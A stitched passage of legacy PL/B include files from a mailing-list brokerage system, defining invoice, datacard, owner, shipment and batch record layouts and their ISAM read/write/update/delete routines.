. CHKN3 DIM 6 218-223 3rd CHECK NUMBER, should be escrow IE TDMC
. LOINVN DIM 12 20-31 LIST OWNER INVOICE NUMBER aim key nininv4
. IMLRCHK DIM 15 255-259 CHECK NUMBER MLR PAID WITH.ADDED AFTER CSH.
.NINVFIL4 AFILE FIXED=400 .by List owner invoice # 15-26
Filelistend
.end patch 10.0
.end patch 2.0
.begin patch 2.1
NINVNAME INIT "NININV.ISI|NINS1:502 "
NINVNME1 INIT "NININV.ISI|NINS1:502 "
NINVNME2 INIT "NININV2.ISI|NINS1:502"
NINVNME3 INIT "NININV.AAM|NINS1:502"
.NINVNME3 INIT "NININV3.AAM|NINS1:502"
.NINVNME4 INIT "NININV4.AAM|NINS1:502"
.NINVNAME INIT "NININV "
.NINVNME1 INIT "NININV"
.NINVNME2 INIT "NININV2"
.end patch 2.1
NINVFLD DIM 6 lr or inv number.
.begin patch 2.0
ninvfld1 DIM 9 CHECK no 1 .\
.end patch 2.0 \
NINVFLD2 DIM 9 CHECK NO 2 .\
NINVFLD3 DIM 9 CHECK NO 3 .-> AIM KEYS.
NINVFLD4 DIM 15 LO INV NO ./
NINVFLD5 DIM 9 Mlr's check ./
NINVFLAG FORM 1
.begin patch 10.0
.NINVFLG2 FORM 1
.NINVFLG3 FORM 1
.NINVFLG4 FORM 1
.NINVFLG5 FORM 1
HoldINv Dim 412 ;hold invoice record (big enough to hold print record)
.end patch 10.0
NINVPATH FORM 1 1= by lr, 2= by invoice number
.
.begin patch 2.0
INVVARS LIST
CODE DIM 1 1-1 CODE, "F"
STATB DIM 1 2-2 STATUS BYTE, "0" open OR "P" we have been paid, Or "e" Estimated (not booked)
.begin patch 10.0
IFiLL1 dim 2 3-4 For Expaned Mlr/Comp #
.end patch 10.0
MLRN DIM 4 5-8 MAILER NUMBER
IFiLL2 dim 3 9-11 For Expaned lr #
LRN DIM 6 12-17 LR NUMBER, ---KEY---
BILLTN DIM 1 18-18 BILL TO NUMBER
PAYTN DIM 1 19-19 PAY-TO NUMBER
LOINVN DIM 12 20-31 LIST OWNER INVOICE NUMBER aim key nininv4
AR form 10.2 32-44 ACCOUNTS RECEIVABLE (A/R), X,XXX,XXX.XX
AP1 Form 10.2 46-57 LIST OWNER AMOUNT (A/P1), XX,XXX.XX
AP2 form 10.2 58-70 2ND ACCOUNTS PAYABLE (A/P2), X,XXX,XXX.XX
.begin patch 10.02
.AP3 Form 10.2 71-83 LIST OWNER AMOUNT (A/P1), XX,XXX.XX
AP3 Form 10.2 71-83 Inter company COmmission
.end patch 10.02
.begin patch 10.001
.COMMPCT DIM 2 84-85 COMMISSION PERCENT, .XX
COMMPCT Form 3.2 84-89 COMMISSION PERCENT, .XX
.begin patch 10.001
PAYCODE DIM 1 90-90 PAYABLE CODE, BLANK,1,2,3 OR 4
IFiLL3 form 3 91-93 For Expaned QTYIn
QTYIN form 9 94-102 Quantity In (ORdered/shipped/into merge)
IFiLL4 form 3 103-105 For Expaned QTyBild
QTYBILD form 9 106-114 QUANTITY Billed (3/30/99 DLH), X,XXX,XXX
PPM form 3.2 115-120 PRICE PER M, XXX.XX
IFiLL5 dim 3 121-123 For Expaned INV#
INVNUM DIM 6 124-129 INVOICE NUMBER ---KEY---
INVDTEc DIM 2 130-131 INVOICE DATE (YEAR)
INVDTEY DIM 2 122-133 INVOICE DATE (YEAR)
INVDTEM DIM 2 134-135 INVOICE DATE (MONTH)
INVDTED DIM 2 136-137 INVOICE DATE (DAY)
.begin patch 10.0
.ADDCHG1 DIM 15 122-136 ADDITIONAL CHARGE #1
.ADDCHG2 DIM 15 137-151 ADDITIONAL CHARGE #2
.ADDCHG3 DIM 15 152-166 ADDITIONAL CHARGE #3
.ADDCHG4 DIM 15 167-181 ADDITIONAL CHARGE #4
.ADDCHG5 DIM 15 182-196 ADDITIONAL CHARGE #5
.ADDCHG6 DIM 15 197-211 ADDITIONAL CHARGE #6
.ADDCHG7 DIM 15 212-226 ADDITIONAL CHARGE #7
.ADDCHG8 DIM 15 227-241 ADDITIONAL CHARGE #8
.ADDCHG9 DIM 15 242-254 ADDITIONAL CHARGE #9
.ADDCHG10 DIM 15 254-269 ADDITIONAL CHARGE #10
.end patch 10.0
COBN DIM 3 138-140 CONTACT # (NIN) OR BROKER # (CMP)
invsales DIM 2 141-142 Salesman code
INCC DIM 1 143-143 INCOME CODE, "1" NOT USED
.begin patch 10.0
IFiLL6 dim 2 144-145 For Expaned lon/Comp #
.end patch 10.0
LON DIM 4 146-149 LIST OWNER NUMBER, ADDED AFTER CASH RECEIPTS
.begin patch 10.0
lon1 DIM 6 150-155 LIST OWNER NUMBER, for a/p2
lon2 DIM 6 156-161 LIST OWNER NUMBER, for a/p3
.end patch 10.0
.begin patch 2.2
.WSJPC DIM 1 288-288 W.S.J. PAYMENT CODE, "1"
WSJPC DIM 1 162-162 BRK Guar Letter "1" if first letter sent, "2" if second letter sent
.end patch 2.2
.begin patch 10.0
IFiLL7 dim 2 163-164 For Expanded Broker/Comp #
.end patch 10.0
IBRKNUM DIM 4 165-168 BROKER/CONSULTANT NUMBER.
IBRKCNT DIM 3 169-171 BROKER/CONSULTANT CONTACT NUMBER.
IRCQTY DIM 9 172-180 quantity of r/c names on net order.
IFiLL8 Form 3 181-183 For Expanded exchange qty
IREXQTY DIM 9 184-192 bILLABLE EXCHANGE QTY ON A SPLIT ORDER. 10/5
iexPPM Form 3.2 193-198 split exchange PRICE PER M, XXX.XX
irnetper dim 2 199-200 net name percentage
inetrc form 3.2 201-206 net name running charge
ADJC DIM 1 207-207 ADJUSTMENT CODE, "*" IF ADJUSTED
statpay DIM 1 208-208 "0" OPEN "P" we have paid .????nec? OR just CHECK FOR a/p AMOUNT AND a CHECK number???
CHKN1 DIM 6 209-214 1ST CHECK NUMBER, AFTER CHECK RELEASED
CHK1DTEc DIM 2 215-216 CHECK DATE (YEAR) FOR A/P 1
CHK1DTEY DIM 2 217-218 CHECK DATE (YEAR)
CHK1DTEM DIM 2 219-220 CHECK DATE (MONTH)
CHK1DTED DIM 2 221-222 CHECK DATE (DAY)
CHKN2 DIM 6 223-228 2ND CHECK NUMBER, ADDED AFTER CHECK RELEASED
CHK2DTEc DIM 2 229-230 CHECK DATE (YEAR) FOR A/P 2
CHK2DTEY DIM 2 231-232 CHECK DATE (YEAR)
CHK2DTEM DIM 2 233-234 CHECK DATE (MONTH)
CHK2DTED DIM 2 235-236 CHECK DATE (DAY)
CHKN3 DIM 6 237-242 3rd CHECK NUMBER, INter company
CHK3DTEc DIM 2 243-244 CHECK DATE (YEAR) FOR A/P 3
CHK3DTEY DIM 2 245-246 CHECK DATE (YEAR)
CHK3DTEM DIM 2 247-248 CHECK DATE (MONTH)
CHK3DTED DIM 2 249-250 CHECK DATE (DAY)
LET90D DIM 1 251-251 OVER 90-DAY LETTER CODE, "1" IF OVER 90 DAY
MLRPAYR form 10.2 252-264 MAILER $ PAYMENT RECEIVED, ADDED AFTER CASH RCT CCYYMMDD
MLRPAYD DIM 8 265-272 DATE OF MAILERS PAYMENT, ADDED AFTER CASH RT CCYYMMDD
GUARPAY DIM 1 273-273 GUARANTEED PAYMENT CODE, "*"=we guar
.IMLRCHK DIM 6 255-400 CHECK NUMBER MLR PAID WITH.ADDED AFTER CSH.
IMLRCHK DIM 15 274-288 CHECK NUMBER MLR PAID WITH.ADDED AFTER CSH. typo somewhere this is correct location
.begin patch 10.02
XNINC Form 9.2 71-83 Non COmm income INter company
.IFill9 Dim 12 289-300
.end patch 10.02
LISTend
.end patch 2.0
.. ............................................................................
<file_sep>/DEVELOP/Includes - why/NMDCCATIO.inc
..............................................................................
.******************************************************
.* NMDCC List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* NMDCC DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_035
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing NMDCC, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : NMDCCKEY
. REQUIRED : 'NMDCCFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NMDCCKEY BRANCH NMDCCFlag TO NMDCC1
CALL NMDCCOpen
NMDCC1 FILEPI 1;NMDCCFile
READ NMDCCFile,NMDCCFld;NMDCCVars
RETURN
..............................................................................
.
. ENTRY POINT : NMDCCTST
. REQUIRED : NMDCCFld
. RETURNED :
. DESCRIPTION : TEST KEY
.
NMDCCTST BRANCH NMDCCFlag TO NMDCC2
CALL NMDCCOpen
NMDCC2 FILEPI 1;NMDCCFile
READ NMDCCFile,NMDCCFld;STR1
RETURN
..............................................................................
.
. ENTRY POINT : NMDCCKS
. REQUIRED :
. RETURNED : NMDCC Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
NMDCCKS BRANCH NMDCCFlag TO NMDCC3
CALL NMDCCOpen
NMDCC3 FILEPI 1;NMDCCFile
READKS NMDCCFile;NMDCCVars
RETURN
..............................................................................
. ENTRY POINT : NMDCCSEQ
. REQUIRED :
. RETURNED : NMDCC Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
NMDCCSEQ BRANCH NMDCCFlag TO NMDCC4
CALL NMDCCOpen
NMDCC4 FILEPI 1;NMDCCFile
READ NMDCCFile,SEQ;NMDCCVars
RETURN
..............................................................................
.
. ENTRY POINT : NMDCCWRT
. REQUIRED : 'NMDCCFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NMDCCWRT BRANCH NMDCCFlag TO NMDCC5
CALL NMDCCOpen
NMDCC5 FILEPI 1;NMDCCFlist
WRITE NMDCCFLIST;NMDCCVars
RETURN
..............................................................................
.
. ENTRY POINT : NMDCCUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
NMDCCUPD BRANCH NMDCCFlag TO NMDCC6
CALL NMDCCOpen
NMDCC6
FILEPI 1;NMDCCFList
UPDATE NMDCCFList;NMDCCVars
RETURN
..............................................................................
.
. ENTRY POINT : NMDCCDEL
. REQUIRED : 'NMDCCFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NMDCCDEL BRANCH NMDCCFlag TO NMDCC7
CALL NMDCCOpen
NMDCC7 FILEPI 1;NMDCCFList
DELETE NMDCCFList
RETURN
..............................................................................
.
. ENTRY POINT : NMDCCOpen
. REQUIRED : 'NMDCCFlag' 'NMDCCPATH'
. RETURNED : 'NMDCCFlag' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NMDCCOpen TRAP NMDCCGONE giving error IF IO
OPEN NMDCCFList
TRAPCLR IO
MOVE C1 TO NMDCCFlag
RETURN
..............................................................................
NMDCCGONE MOVE NMDCCNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/NMLGIO.INC
..............................................................................
NMLGKEY BRANCH NMLGFLAG TO NMLG1
CALL NMLGOPEN
NMLG1 FILEPI 1;NMLGFILE
READ NMLGFILE,NMLGFLD;NMLGKEY:
NMLGFIL:
NMLGCAT
RETURN
..............................................................................
NMLGTST BRANCH NMLGFLAG TO NMLG2
CALL NMLGOPEN
NMLG2 FILEPI 1;NMLGFILE
READ NMLGFILE,NMLGFLD;STR1
RETURN
..............................................................................
NMLGKS BRANCH NMLGFLAG TO NMLG3
CALL NMLGOPEN
NMLG3 FILEPI 1;NMLGFILE
READKS NMLGFILE;NMLGKEY:
NMLGFIL:
NMLGCAT
RETURN
..............................................................................
NMLGSEQ BRANCH NMLGFLAG TO NMLG4
CALL NMLGOPEN
NMLG4 FILEPI 1;NMLGFILE
READ NMLGFILE,SEQ;NMLGKEY:
NMLGFIL:
NMLGCAT
RETURN
..............................................................................
NMLGWRT BRANCH NMLGFLAG TO NMLG5
CALL NMLGOPEN
NMLG5 FILEPI 1;NMLGFILE
WRITE NMLGFILE,NMLGFLD;NMLGKEY:
NMLGFIL:
NMLGCAT
RETURN
..............................................................................
NMLGDEL BRANCH NMLGFLAG TO NMLG7
CALL NMLGOPEN
NMLG7 FILEPI 1;NMLGFILE
DELETE NMLGFILE,NMLGFLD
RETURN
..............................................................................
NMLGOPEN TRAP NMLGGONE IF IO
OPEN NMLGFILE,NMLGNAME
TRAPCLR IO
MOVE C1 TO NMLGFLAG
RETURN
..............................................................................
NMLGGONE MOVE NMLGNAME TO FILENAME
CALL FILEGONE
..............................................................................
<file_sep>/include/SRDSxSLTdd.inc
******************************************************
* SRDSxSLTDD INCLUSION
* SUBSIDIARY FILE FOR DATACARD
* ADDRESSING FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS SRDSx FILE.
* ****************************************************
.
. FILE: NISRDSxSLT
. LENGTH: 51
. TYPE: ISAM,MANAGED
. INDEX KEY: 1-6 SRDSxSLTLIST
......................................................
SRDSxSLTNAME INIT "SRDSx_SLT.ISI|NINS1:502"
SRDSxSLTFLIST FILELIST
SRDSxSLTFILE IFILE KEYLEN=30,FIXED=60,Name="SRDSxSLT.isi|NINS1:502"
FILELISTEND
.
SRDSxSLTLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
SRDSxSLTFLD DIM 30
SRDSxSLTFLAG FORM 1
SRDSxSLTPATH FORM 1
.
SRDSxSLTVARS LIST
SRDSxSLT DIM 30 1-30 SRDS Select Desc
SRDSxSLTDESC DIM 30 31-60 NIN Standard SELECTION CODE DESCRIPTION
LISTEND
<file_sep>/DEVELOP/datadesigner/datadesigner.ini
mru1 F:\Dev\P\CMS\calendar.ddd
mru2 F:\Dev\P\CMS\calendar.ddd
mru3 F:\Dev\P\CMS\calendar.ddd
mru4 F:\Dev\P\CMS\calendar.ddd
mru5 F:\Dev\P\CMS\calendar.ddd
<file_sep>/include/SRDSLOdd.inc
.******************************************************
.* SRDS List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* SRDS DATACARD FILES.
.* ****************************************************
.
. FILE:
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: XML from SRDS if there is not a hit
. on our system they get put into an indexed/aimdexed file for review
......................................................
. LAST MODIFIED
. patch 1.0 13 April 2011 DLH New
......................................................
.
SRDSLOFlist Filelist
SrdsLOfIle IFile fixed=500,NoDup,Name="SRDS_Own.isi|NINS1:502"
SrdsLOfile2 AFile fixed=500,Name="SRDS_Own.aam|NINS1:502"
FilelistEnd
SRDSLONAME Init "SRDS_Own|NINS1:502"
SRDSLOFLAG FORM 1
SRDSLOPATH FORM 1
SRDSLOLock FORM 1
SRDSLOFLd Dim 6
SRDSLOfld2 Dim 58 .aim key
.owner / manager file
SRDSLOVARS LIST
SRDSONUM DIM 6 1-6 .SRDS owner NUMBER. **KEY**
SRDSCOMP DIM 55 7-61 .*******Required*******
SRDSADDR DIM 35 62-96
SRDSADDR2 DIM 35 97-131
SRDSCITY DIM 30 132-161 .CITY.
SRDSSTATE DIM 2 162-163 .STATE..MAY NEED TO INCREASE FOR USE IN FOREIGN COUNTRY STATES
SRDSZIP DIM 10 164-173 .ZIP..MAY NEED TO INCREASE FOR USE IN FOREIGN COUNTRY
SRDSCNTRY DIM 15 174-188 .MAY NEED TO INCREASE FOR USE IN FOREIGN COUNTRY
.MANY OF THE NEWER POST SOVIET COUNTRIES ARE IN THE 99* AREA, SO GO TO 4 BYTES
SRDSCNTRYCDE DIM 4 189-192 .country code for phone/fax default = 1
.MAY NEED TO INCREASE FOLLOWING 3 FIELDS FOR USE IN FOREIGN COUNTRY
.Do other countries have longer phone number lengths?
SRDSLOPHONE RECORD 193-202 .Phone Number
SRDSLOPHONE1 DIM 3
SRDSLOPHONE2 DIM 3
SRDSLOPHONE3 DIM 4
REcordEnd
SRDSLOFAX REcord 203-212 .Fax Number **********Required*************
SRDSLOfax1 DIM 3
SRDSLOfax2 DIM 3
SRDSLOfax3 DIM 4
REcordend
SRDSLOACCTFAX DIM 10 213-222 .Accounting fax Number
SRDSLOEMAIL DIM 50 223-272 .Corporate Email Address (Generic)
SRDSLOFTP DIM 50 273-322 .SRDSanies FTP Site
SRDSLOType Dim 2 323-324
SRDSOFIll Dim 176 325-500
Listend
<file_sep>/include/nord8io.inc
;..............................................................................
;
; NORD8IO INCLUSION
; NIN RECORD 'NEW RECORD' IO INCLUSION
;
; FILE NAME : NINORD8
;
;
;.............................................................................
;
NORD8KEY
BRANCH NORD8FLAG OF NORD81
CALL NORD8OPEN
NORD81
TRAP IOMssg Giving Error if IO
branch NORD8lock to NOR81L,NOR81R,NOR81N
NOR81L
FILEPI 1;NORD8FILE
READ NORD8FILE,NORD8FLD;ORD8VARS
TRAPCLR IO
RETURN
NOR81R
READLK NORD8FILE,NORD8FLD;ORD8VARS
TRAPCLR IO
RETURN
NOR81N
READ NORD8FILE,NORD8FLD;ORD8VARS
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD8TST
; REQUIRED : NORD8FLD
; RETURNED :
; DESCRIPTION : TEST KEY
;
NORD8TST
BRANCH NORD8FLAG TO NORD82
CALL NORD8OPEN
NORD82
TRAP IOMssg Giving Error if IO
branch NORD8lock to NOR82L,NOR82R,NOR82N
NOR82L
FILEPI 1;NORD8FILE
READ NORD8FILE,NORD8FLD;;
TRAPCLR IO
RETURN
NOR82R
READLK NORD8FILE,NORD8FLD;;
TRAPCLR IO
RETURN
NOR82N
READ NORD8FILE,NORD8FLD;;
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD8KS
; REQUIRED :
; RETURNED : RECORD NUMBER RECORD
; DESCRIPTION : KEY SEQUENTIAL RECORD NUMBER FILE READ
;
NORD8KS
BRANCH NORD8FLAG TO NORD83
CALL NORD8OPEN
NORD83
TRAP IOMssg Giving Error if IO
branch NORD8lock to NOR83L,NOR83R,NOR83N
NOR83L
FILEPI 1;NORD8FILE
READKS NORD8FILE;ORD8VARS
TRAPCLR IO
RETURN
NOR83R
READKSLK NORD8FILE;ORD8VARS
TRAPCLR IO
RETURN
NOR83N
READKS NORD8FILE;ORD8VARS
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD8SEQ
; REQUIRED :
; RETURNED : RECORD NUMBER RECORD
; DESCRIPTION : SEQUENTIAL RECORD NUMBER FILE READ
; APPLICATION'S RESPONSIBILITY TO TEST FLAGS
;
NORD8SEQ
BRANCH NORD8FLAG TO NORD84
CALL NORD8OPEN
NORD84
TRAP IOMssg Giving Error if IO
branch NORD8lock to NOR84L,NOR84R,NOR84N
NOR84L
FILEPI 1;NORD8FILE
READ NORD8FILE,SEQ;ORD8VARS
TRAPCLR IO
RETURN
NOR84R
READLK NORD8FILE,SEQ;ORD8VARS
TRAPCLR IO
RETURN
NOR84N
READ NORD8FILE,SEQ;ORD8VARS
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD8WRT
; REQUIRED : 'NORD8FLD'
; RETURNED :
; DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
;
NORD8WRT
BRANCH NORD8FLAG TO NORD85
CALL NORD8OPEN
NORD85
TRAP IOMssg Giving Error if IO
FILEPI 1;NORD8FLIST
WRITE NORD8FLIST;ORD8VARS
trapclr IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD8UPD
; REQUIRED : A PREVIOUS KEY READ
; RETURNED :
; DESCRIPTION : KEY UPDATE RECORD NUMBER FILE
;
NORD8UPD
BRANCH NORD8FLAG TO NORD86
CALL NORD8OPEN
NORD86
TRAP IOMssg Giving Error if IO
FILEPI 1;NORD8FLIST
UPDATE NORD8FLIST;ORD8VARS
trapclr IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD8DEL
; REQUIRED : 'NORD8FLD'
; RETURNED :
; DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
;
NORD8DEL
BRANCH NORD8FLAG TO NORD87
CALL NORD8OPEN
NORD87
TRAP IOMssg Giving Error if IO
FILEPI 1;NORD8FLIST
DELETE NORD8FLIST
trapclr IO
RETURN
..............................................................................
. ENTRY POINT : NORD8AIM
. REQUIRED : NORD8FLD1,NORD8FLD2
. RETURNED : RECORD
. DESCRIPTION : AIM FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NORD8AIM
BRANCH NORD8FLAG,NORD88
CALL NORD8OPEN
NORD88
trap IOMssg giving Error if IO
READ NORD8FLE2,NORD8FLD1,NORD8FLD2;ORD8VARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NORD8KG
. REQUIRED : VALID PREVIOUS AIM READ
. RETURNED : RECORD
. DESCRIPTION : AIM KEY GENEREIC FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NORD8KG
BRANCH NORD8FLAG,NORD89
CALL NORD8OPEN
NORD89
trap IOMssg giving Error if IO
READKG NORD8FLE2;ORD8VARS
trapclr IO
RETURN
;...............................................................................
;
; ENTRY POINT : NORD8OPEN
; REQUIRED : 'NORD8FLAG'
; RETURNED : 'NORD8FLAG' SET TO '1' IF OPENED
; DESCRIPTION : OPEN NIN RECORD NUMBER FILE
; DISPLAY ERROR AND ABORT IF NOT ON-LINE.
;
NORD8OPEN
TRAP NORD8GONE IF IO
OPEN NORD8FLIST
TRAPCLR IO
MOVE C1 TO NORD8FLAG
RETURN
;
NORD8GONE MOVE NORD8NAME TO FILENAME
CALL FILEGONE
;
;.............................................................................<file_sep>/include/NADJCLDD.inc
; Last change: JD 28 Aug 1999 9:53 am
..............................................................................
.
. NADJCLDD INCLUSION
. NIN ADJUSTMENT COMPUTATION DATA DEFINITIONS
.
..............................................................................
.
ARJ FORM 10.2 ADJUSTED A/R
AP1J FORM 10.2 ADJUSTED A/P1
AP2J FORM 10.2 ADJUSTED A/P2
APJ FORM 10.2 ADJUSTED TOTAL AP
LRINCJ FORM 10.2 ADJUSTED LRINC
CTAXJ FORM 7.2 ADJUSTED CITY TAX
STAXJ FORM 7.2 ADJUSTED STATE TAX
TAXESJ FORM 7.2 ADJUSTED TOTAL TAXES
.
CVTFLD DIM 13 WORK FIELD USED FOR MP CONVERSION.
MPCHARS INIT "}JKLMNOPQR" VALID MINUS OVERPUNCH CHARACTERS
NUM10 FORM 10 NUMERIC WORK FIELD FOR CONVERSION.
MPCHANGE INIT "}0J1K2L3M4N5O6P7Q8R9"
NUM102 FORM 10.2 RETURNED NUMERIC FIELD W/DOL.CENT CONVERTED.
<file_sep>/include/nshp3dd.inc
..............................................................................
.
. NSHP3DD INCLUSION
. NIN Inventory FILE DEFINITION
.
. FILE NAME : NINSHP3
. REC LENGTH: 336 FIXED
. INDEX KEY : 1-6 (LR NUMBER)
.
..............................................................................
.
NSHP3FLIST Filelist
NSHP3FILE IFILE KEYLEN=6,FIXED=336,Name="NINSHP3.ISI|NINS1:502 "
FILELISTEND
NSHP3NAME INIT "NINSHP3.ISI|NINS1:502"
NSHP3FLD DIM 6
NSHP3FLAG FORM 1
NSHP3lock form 1 0 OR 1=filepi,2=recordlock, 3=no lock.
.
NSHP3VARS list
NSHP3LR DIM 6 001-006 LR Number
NSHP3RQTY DIM 9 007-015 Received Qty
NSHP3Date DIM 8 016-023 List Received Date
NSHP3DQTY DIM 9 024-032 Declared Qty (The quantity the list owner stated was available)
NSHP3Comments DIM 255 032-286 Comments
NSHP3FILLER DIM 50 287-336 Filler
listend
..............................................................................
<file_sep>/include/GNXTDD.INC
..............................................................................
.
. get next INCLUSION
. gnxt FILE DEFINITION
.
. FILE NAME : GNXT
. REC LENGTH: 14 FIXED
. INDEX KEY : 1-8 (1-1 CO DESIGNATION, 2-4 'FILE DESCRIPTOR' 5-7 'NXT')
.
..............................................................................
.
GNXTFILE IFILE KEYLEN=8,FIXED=14,UNCOMP,Name="Gnxt.ISI|NINS1:502"
GNXTNAME INIT "GNXT.ISI|NINS1:502"
GNXTFLD DIM 8
GNXTFLAG FORM 1
* ....................................................
.
GNXTKEY DIM 8 1-8 1-1 COMPANY 'N'
. 2-4 FILE IE 'ORD'
. 5-6 NXT
. EXCEPT NINPI DATACARD LOCK.
GNXTNUM DIM 6 9-14 NEXT NUMBER TO BE USED.
...............................................................................
<file_sep>/include/tncbakdd.inc
..............................................................................
.
. TNCBAKDD INCLUSION
. NIN BROKER NOTES FILE DEFINITION
.
. FILE NAME : TNCBACK
. REC LENGTH: 103
. INDEX KEY : 1 - 25
.
.File Created 8/15/03
..............................................................................
.
TNCBAKFILE IFILE KEYLEN=25
TNCBAKNAME INIT "TNCBACK.ISI"
TNCBAKFLD DIM 25
TNCBAKFLAG FORM 1
TNCBAKlock form 1 0 or 1 - filepi, 2 =record locking, = no locks
..............................................................................
TNCBAKVARS list
TNCBAKSOURCEKEY dim 25
TNCBAKPKGDESC dim 60
;TNCBAKCONST INIT " 0.70"
TNCBAKCONST form 6.2
TNCBAKCOST form 6.2
listend
tncbakCOSTCONST INIT "0.70"
<file_sep>/include/NDatCntdd.inc
..............................................................................
.
. NdatCntDD INCLUSION
. NIN Dat/Min contactFILE DEFINITION
.
. FILE NAME : NINdatCnt
. REC LENGTH: 120 FIXED
. INDEX KEY : 2-6 (List #)
. AIM KEY : 30-546
..26Oct2006 New
..............................................................................
.
NdatCntNAME INIT "NINdatCnt.dat|NINS1:502"
NdatCntFLD DIM 6
NDatCntFList Filelist
NdatCntFLE1 IFILE KEYLEN=4,FIXED=120,Name="NINdatCnt.isi|NINS1:502"
NdatCntFLE2 AFILE FIXED=120,Name="NINdatCnt.AAM|NINS1:502"
filelistend
NdatCntFLD2 DIM 28
NdatCntFLaG FORM 1
NdatCntPATH FORM 1
.
NDatCntvars list
NDatCntNum dim 6 1-6 NIN List # - Key
NdatCntPhn Dim 11 7-18 Manager Phone
NdatCntFax Dim 11 19-29 Manager fax
NDatCnt Dim 25 30-54 Contact - key
NDatCntEml Dim 50 55-104
NDatCntFill Dim 16 105-120 not used
listend
..............................................................................*
<file_sep>/include/Batchio.inc
...............................................................................
..
.. BatchIO INCLUSION
.. NIN Batch FILE I/O ROUTINES
..
...............................................................................
..
.. ENTRY POINT : BatchKEY
.. REQUIRED : 'BatchFLD'
.. RETURNED : Contact RECORD
.. DESCRIPTION : EXACT ISAM KEY READ
.. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
..
BatchKEY
BRANCH BatchFLAG,Batch1
CALL BatchOPEN
Batch1
TRAP IOMssg Giving Error if IO
BRANCH BatchLOCK,Batch1L,Batch1R,Batch1N
Batch1L
FILEPI 1;BatchFILE
READ BatchFILE,BatchFLD;BatchVARS
RETURN
Batch1R
READLK BatchFILE,BatchFLD;BatchVARS
RETURN
Batch1N
READ BatchFILE,BatchFLD;BatchVARS
RETURN
.. ENTRY POINT : BatchKEY2
.. REQUIRED : 'BatchFLD'
.. RETURNED : Contact RECORD
.. DESCRIPTION : EXACT ISAM KEY READ
.. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
BatchKEY2
BRANCH BatchFLAG,Batch2
CALL BatchOPEN
Batch2
TRAP IOMssg Giving Error if IO
BRANCH BatchLOCK,Batch2l,Batch2r,Batch2n
Batch2L
FILEPI 1;BatchFILE2
READ BatchFILE2,BatchFLD4;BatchVARS
RETURN
Batch2R
READLK BatchFILE2,BatchFLD4;BatchVARS
RETURN
Batch2N
READ BatchFILE2,BatchFLD4;BatchVARS
RETURN
...............................................................................
..
.. ENTRY POINT : BatchTST
.. REQUIRED : BatchFLD
.. RETURNED :
.. DESCRIPTION : TEST KEY
..
BatchTST
BRANCH BatchFLAG,Batch2T
CALL BatchOPEN
Batch2T
TRAP IOMssg Giving Error if IO
BRANCH BatchLOCK,Batch2LT,Batch2RT,Batch2NT
Batch2LT
FILEPI 1;BatchFILE
READ BatchFILE,BatchFLD;;
RETURN
Batch2RT
READLK BatchFILE,BatchFLD;;
RETURN
Batch2NT
READ BatchFILE,BatchFLD;;
RETURN
.patchdb
...............................................................................
..
.. ENTRY POINT : BatchTST2
.. REQUIRED : BatchFLD
.. RETURNED :
.. DESCRIPTION : TEST KEY
..
BatchTST2
BRANCH BatchFLAG,Batch2T2
CALL BatchOPEN
Batch2T2
TRAP IOMssg Giving Error if IO
BRANCH BatchLOCK,Batch2LT2,Batch2RT2,Batch2NT2
Batch2LT2
FILEPI 1;BatchFILE
READ BatchFile2,BatchFLD4;;
RETURN
Batch2RT2
READLK BatchFile2,BatchFLD4;;
RETURN
Batch2NT2
READ BatchFile2,BatchFLD4;;
RETURN
...............................................................................
...............................................................................
..
.. ENTRY POINT : BatchKS
.. REQUIRED :
.. RETURNED : Contact RECORD
.. DESCRIPTION : KEY SEQUENTIAL Contact FILE READ
..
BatchKS
BRANCH BatchFLAG,Batch3
CALL BatchOPEN
Batch3
TRAP IOMssg Giving Error if IO
BRANCH BatchLOCK,Batch3L,Batch3R,Batch3N
Batch3L
FILEPI 1;BatchFILE
READKS BatchFILE;BatchVARS
RETURN
Batch3R
READKSLK BatchFILE;BatchVARS
RETURN
Batch3N
READKS BatchFILE;BatchVARS
RETURN
...............................................................................
.. ENTRY POINT : BatchSEQ
.. REQUIRED :
.. RETURNED : Contact RECORD
.. DESCRIPTION : SEQUENTIAL Contact FILE READ
.. APPLICATION'S RESPONSIBILITY TO TEST FLGS
..
BatchSEQ
BRANCH BatchFLAG,Batch4
CALL BatchOPEN
Batch4
